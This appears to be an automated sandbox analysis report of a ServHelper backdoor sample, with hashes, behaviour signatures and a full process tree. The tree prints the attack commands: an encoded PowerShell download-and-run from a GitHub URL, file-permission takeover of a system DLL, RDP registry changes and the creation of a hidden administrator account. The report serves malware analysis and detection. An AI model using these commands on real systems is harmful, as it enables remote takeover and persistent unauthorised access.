Analysis
-
max time kernel
134s -
max time network
122s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
11-06-2021 14:59
Static task
static1
Behavioral task
behavioral1
Sample
20f307c716a689f4afa3a76b7143db22.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
20f307c716a689f4afa3a76b7143db22.exe
Resource
win10v20210408
General
-
Target
20f307c716a689f4afa3a76b7143db22.exe
-
Size
6.0MB
-
MD5
20f307c716a689f4afa3a76b7143db22
-
SHA1
2fd6796fd158c93b14654240533511af6fec03e5
-
SHA256
3647e2dc4336b2eeb828371821c706a329dce645cb16f9c1c31c3faeae8f56dd
-
SHA512
0a8d1b2d0cbd3860df907eb692aa2d775f021822b4d856c051d84e8056a2c1cf893bab68f471b69db0615341dd2dfe78dfac1b79d2239217cfbdf71bfb84061b
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 11 1388 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exepid process 1960 icacls.exe 2000 icacls.exe 576 icacls.exe 1212 icacls.exe 860 icacls.exe 1064 takeown.exe 1856 icacls.exe 1216 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 956 956 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exepid process 2000 icacls.exe 576 icacls.exe 1212 icacls.exe 860 icacls.exe 1064 takeown.exe 1856 icacls.exe 1216 icacls.exe 1960 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 21 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d175d3c-1d85-4cc9-bd2c-60bcb8b8249e powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3a9f49bf-6bae-4dbb-a3f9-d367fa7074df powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f00c55de-be40-4e29-9aee-b7c8e48d36ac powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZVOUCCAZ1MOW2DRW7QQM.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d5590c60-3c66-47a1-9389-a032b558775e powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e801fb25-a40e-4f38-8bf8-b40f5dd3f0db powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7ec28881-297a-4c37-a8a3-5fd028925067 powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e39fe1fb-6171-4196-be45-dcb4150bcb96 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0b3f6521-2646-42cf-95b9-c45dd35dbe0f powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_46e76794-119b-4abc-b2f5-5e19a5f0da72 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e60513dd-6f76-4617-a0f5-a616047d9436 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e80b161c-a211-44b5-ada6-46683a45d207 powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exeWMIC.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a0fd42b5e35ed701 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1708 powershell.exe 1708 powershell.exe 1768 powershell.exe 1768 powershell.exe 1008 powershell.exe 1008 powershell.exe 1672 powershell.exe 1672 powershell.exe 1708 powershell.exe 1708 powershell.exe 1708 powershell.exe 1388 powershell.exe 1388 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 468 956 956 956 956 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1708 powershell.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeDebugPrivilege 1008 powershell.exe Token: SeDebugPrivilege 1672 powershell.exe Token: SeRestorePrivilege 1216 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1684 WMIC.exe Token: SeIncreaseQuotaPrivilege 1684 WMIC.exe Token: SeAuditPrivilege 1684 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1684 WMIC.exe Token: SeIncreaseQuotaPrivilege 1684 WMIC.exe Token: SeAuditPrivilege 1684 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1072 WMIC.exe Token: SeIncreaseQuotaPrivilege 1072 WMIC.exe Token: SeAuditPrivilege 1072 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1072 WMIC.exe Token: SeIncreaseQuotaPrivilege 1072 WMIC.exe Token: SeAuditPrivilege 1072 WMIC.exe Token: SeDebugPrivilege 1388 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
20f307c716a689f4afa3a76b7143db22.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 1100 wrote to memory of 1708 1100 20f307c716a689f4afa3a76b7143db22.exe powershell.exe PID 1100 wrote to memory of 1708 1100 20f307c716a689f4afa3a76b7143db22.exe powershell.exe PID 1100 wrote to memory of 1708 1100 20f307c716a689f4afa3a76b7143db22.exe powershell.exe PID 1708 wrote to memory of 1288 1708 powershell.exe csc.exe PID 1708 wrote to memory of 1288 1708 powershell.exe csc.exe PID 1708 wrote to memory of 1288 1708 powershell.exe csc.exe PID 1288 wrote to memory of 1160 1288 csc.exe cvtres.exe PID 1288 wrote to memory of 1160 1288 csc.exe cvtres.exe PID 1288 wrote to memory of 1160 1288 csc.exe cvtres.exe PID 1708 wrote to memory of 1768 1708 powershell.exe powershell.exe PID 1708 wrote to memory of 1768 1708 powershell.exe powershell.exe PID 1708 wrote to memory of 1768 1708 powershell.exe powershell.exe PID 1708 wrote to memory of 1008 1708 powershell.exe powershell.exe PID 1708 wrote to memory of 1008 1708 powershell.exe powershell.exe PID 1708 wrote to memory of 1008 1708 powershell.exe powershell.exe PID 1708 wrote to memory of 1672 1708 powershell.exe powershell.exe PID 1708 wrote to memory of 1672 1708 powershell.exe powershell.exe PID 1708 wrote to memory of 1672 1708 powershell.exe powershell.exe PID 1708 wrote to memory of 1064 1708 powershell.exe takeown.exe PID 1708 wrote to memory of 1064 1708 powershell.exe takeown.exe PID 1708 wrote to memory of 1064 1708 powershell.exe takeown.exe PID 1708 wrote to memory of 1856 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 1856 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 1856 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 1216 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 1216 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 1216 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 1960 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 1960 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 1960 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 2000 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 2000 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 2000 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 576 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 576 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 576 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 1212 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 1212 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 1212 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 860 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 860 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 860 1708 powershell.exe icacls.exe PID 1708 wrote to memory of 1744 1708 powershell.exe reg.exe PID 1708 wrote to memory of 1744 1708 powershell.exe reg.exe PID 1708 wrote to memory of 1744 1708 powershell.exe reg.exe PID 1708 wrote to memory of 1256 1708 powershell.exe reg.exe PID 1708 wrote to memory of 1256 1708 powershell.exe reg.exe PID 1708 wrote to memory of 1256 1708 powershell.exe reg.exe PID 1708 wrote to memory of 1116 1708 powershell.exe reg.exe PID 1708 wrote to memory of 1116 1708 powershell.exe reg.exe PID 1708 wrote to memory of 1116 1708 powershell.exe reg.exe PID 1708 wrote to memory of 1700 1708 powershell.exe net.exe PID 1708 wrote to memory of 1700 1708 powershell.exe net.exe PID 1708 wrote to memory of 1700 1708 powershell.exe net.exe PID 1700 wrote to memory of 1684 1700 net.exe net1.exe PID 1700 wrote to memory of 1684 1700 net.exe net1.exe PID 1700 wrote to memory of 1684 1700 net.exe net1.exe PID 1708 wrote to memory of 2028 1708 powershell.exe cmd.exe PID 1708 wrote to memory of 2028 1708 powershell.exe cmd.exe PID 1708 wrote to memory of 2028 1708 powershell.exe cmd.exe PID 2028 wrote to memory of 456 2028 cmd.exe cmd.exe PID 2028 wrote to memory of 456 2028 cmd.exe cmd.exe PID 2028 wrote to memory of 456 2028 cmd.exe cmd.exe PID 456 wrote to memory of 300 456 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\20f307c716a689f4afa3a76b7143db22.exe"C:\Users\Admin\AppData\Local\Temp\20f307c716a689f4afa3a76b7143db22.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gzhxopf0\gzhxopf0.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA489.tmp" "c:\Users\Admin\AppData\Local\Temp\gzhxopf0\CSCDBCC0248C7A847EBA4688113AFEA8E2.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc cjzofg0a /add1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc cjzofg0a /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc cjzofg0a /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc cjzofg0a1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc cjzofg0a2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc cjzofg0a3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0042da65-6a0d-444e-9182-5657141093a5MD5
6f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_01beae65-39e3-4a60-a039-e3a50d156d50MD5
e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_059a5047-28df-458f-9a3f-70af485306fbMD5
d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2a69743f-de4c-4302-88b9-02014f035850MD5
faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3e9c5d27-4903-4f49-aa18-33ffc5ff0076MD5
7f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_88330b45-5718-4cdc-84ab-1c354903508eMD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f6d77ca6-de71-47cb-8071-792c0cb0e9ebMD5
2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
6ea4a38d903d92b829e92e7c36b1facc
SHA1051052126538ccd866f919dd78a302af42820a4d
SHA25671925e822449eae8c589c4f7e502f39bc3f6a7f6f04d19399c494166ac369630
SHA512bc61c6f4e9d979cc08e9d513e3e33255a7e49627332e4cbb3bee7f4ee813c56a4704df1b13b41d0b7c12ca77011558bdcbd2c29349798892ae23d3a39a316ae0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
cf284edd4e3dc7703d11a5a9de2b6960
SHA1f26058acfdbbb4a242d51584666ed9abf56d6500
SHA256e6037f85bc79a45ab5f98412d2e4696d4eae43115fb230ec4ccb8e1b7ea6c591
SHA5123295175a29910a25012b25a3b874273511d993bc8ecc8ac343fc3b92fabff4d699aaa509d4b86339a897281814bee1d8afd8f8120b92dbff0bf219ece47a807a
-
C:\Users\Admin\AppData\Local\Temp\RESA489.tmpMD5
9f4cbc0cf291525302c02948f07597b6
SHA103e63f57c062b44ede0df916efa9f07242f5d83e
SHA256ca0d1cff1d0026e27b315378caa05df073b3a57e145bc8aaef72c34d02d3f496
SHA5128a7dc4c48b4a7c5940706368a6739a8e265b882c18cc154545e38cdff942e066a3efb352faadbc7e8d03def09c0c30e88c3b87f19d6ca8e8f8fca76715d37f51
-
C:\Users\Admin\AppData\Local\Temp\gzhxopf0\gzhxopf0.dllMD5
304797b1978f10d26c405645f2f9676f
SHA1cceaf42852f5e62128e4a4702db11b5f31f931f2
SHA256648659248d1997df43c32cec911dae42618d9afdce9acc03127a048b83cc5482
SHA5120bbd45a1ddb82bf251cbf9a59b33db592ecb4d124e6afb77fdec7b466556abfaff333dc7bf43c66fa45725393f9a1c29b973abd557003dc19c0676be5265bb64
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1MD5
920b50692e0e9c4e32c79f89fafce0c4
SHA14cb71db2bb05daa4e84c649b6c58cbfd20c8e484
SHA25685fda9140e2356752f4139c674b78e36e4bb5da57b7cff27d8db357a4357deaf
SHA512966f23d6366c0a901114e84e64e9d209e77f1de6e40e93ad7d55047732b4ba213fdac8f05cd21cebfe11a0bab79e2cc95739fa3c6eb0eafc917568a7168c7d86
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
baea9da2a5adf3d3555d141943d5c252
SHA1c8851e4ec4255569e88b4a1b204ab213837afabf
SHA256fe28bfd58e8997b0e017fa6c780a108630bd6ec0a65a928263764a646f690656
SHA51251e2539b3e0c8b6709c110c8c4b697f8424e79bdb5187bb025d0330f415af0bbde9a923be54e580faf1f097f1718b411bad85bd0d764eff8effc916d0b719a8c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
